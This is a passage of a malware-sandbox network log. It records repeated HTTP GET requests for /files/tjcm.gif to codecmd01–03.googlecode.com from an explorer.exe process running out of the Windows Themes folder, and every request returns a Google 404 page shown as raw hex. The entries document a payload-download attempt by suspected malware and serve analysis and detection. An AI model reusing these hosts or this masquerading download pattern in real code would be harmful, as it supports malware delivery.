                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:18.347327948 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      13192.168.2.649867173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:19.723408937 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:21.125000000 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:20 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:21.125185966 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      14192.168.2.649873173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:22.483345032 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:23.885251999 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:23 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:23.885308027 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      15192.168.2.649879173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:25.248440027 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.753021002 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:26 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:26.753036976 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      16192.168.2.649886173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:28.113275051 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:29.514801979 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:29 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:29.514816999 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      17192.168.2.649896173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:30.908417940 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.309447050 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:32 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:32.309479952 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      18192.168.2.649902173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:33.758671045 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:35.154102087 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:34 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:35.154206038 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      19192.168.2.649909173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:36.648967981 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:37.991583109 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:37 GMT
